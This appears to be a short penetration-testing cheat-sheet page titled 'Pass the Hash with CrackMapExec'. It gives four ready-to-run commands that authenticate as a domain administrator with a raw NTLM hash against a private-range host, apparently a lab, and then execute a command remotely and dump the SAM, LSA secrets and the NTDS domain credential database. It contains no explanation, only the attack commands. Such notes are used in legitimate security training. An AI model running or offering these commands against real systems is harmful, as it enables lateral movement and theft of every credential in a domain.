Pass the Hash with CrackMapExec

crackmapexec smb 192.168.56.11 -d north -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -x whoami

crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --sam
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --lsa
crackmapexec smb 192.168.56.11 -d NORTH -u administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 --ntds


Last updated